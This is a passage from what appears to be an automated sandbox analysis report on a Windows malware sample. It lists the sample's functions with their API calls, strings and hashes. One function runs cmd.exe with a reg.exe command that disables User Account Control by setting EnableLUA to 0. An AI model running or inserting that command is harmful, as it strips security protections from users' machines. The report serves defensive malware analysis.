                                • Opcode Fuzzy Hash: 205b82dffe9b0f77f7c93e78d4092e9a7ef319f9f0d3ec4eb64b3aa0a1bff41f
                                • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                • GetLastError.KERNEL32 ref: 0041D580
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ClassCreateErrorLastRegisterWindow
                                • String ID: 0$MsgWindowClass
                                • API String ID: 2877667751-2410386613
                                • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                • CloseHandle.KERNEL32(?), ref: 004077AA
                                • CloseHandle.KERNEL32(?), ref: 004077AF
                                Strings
                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreateProcess
                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                • API String ID: 2922976086-4183131282
                                • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                • SetEvent.KERNEL32(?), ref: 0040512C
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                • CloseHandle.KERNEL32(?), ref: 00405140
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                • String ID: KeepAlive | Disabled
                                • API String ID: 2993684571-305739064
                                • Opcode ID: c594fc0502ac089e8ceed4a366586e120d9a374f389bb2b837d8f1f373a196b1
                                • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                • Opcode Fuzzy Hash: c594fc0502ac089e8ceed4a366586e120d9a374f389bb2b837d8f1f373a196b1
                                • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                Download Yara Rule
                                APIs
                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID: SETTINGS
                                • API String ID: 3473537107-594951305
                                • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                • _free.LIBCMT ref: 004493BD
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00449589
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                • String ID:
                                • API String ID: 1286116820-0
                                • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                  • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                  • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                • String ID:
                                • API String ID: 2180151492-0
                                • Opcode ID: af739ac690ee8d07d81366b8be29f9ccbff63967b6472fc478213852870bed76
                                • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                • Opcode Fuzzy Hash: af739ac690ee8d07d81366b8be29f9ccbff63967b6472fc478213852870bed76
                                • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                Download Yara Rule
                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                • _free.LIBCMT ref: 0044F3BF
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                • Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                                • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreatePointerWrite
                                • String ID:
                                • API String ID: 1852769593-0
                                • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                                • _free.LIBCMT ref: 004482D3
                                • _free.LIBCMT ref: 004482FA
                                • SetLastError.KERNEL32(00000000), ref: 00448307
                                • SetLastError.KERNEL32(00000000), ref: 00448310
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                                • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                • Opcode Fuzzy Hash: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                                • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C1DD Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseHandleOpen$FileImageName
                                • String ID:
                                • API String ID: 2951400881-0
                                • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 004509D4
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 004509E6
                                • _free.LIBCMT ref: 004509F8
                                • _free.LIBCMT ref: 00450A0A
                                • _free.LIBCMT ref: 00450A1C
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00444066
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00444078
                                • _free.LIBCMT ref: 0044408B
                                • _free.LIBCMT ref: 0044409C
                                • _free.LIBCMT ref: 004440AD
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044BA37 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG
                                • API String ID: 0-263838557
                                • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                                • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                Download Yara Rule
                                APIs
                                • _strpbrk.LIBCMT ref: 0044E738
                                • _free.LIBCMT ref: 0044E855
                                  • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                  • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                                  • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                                Strings
                                Memory Dump Source
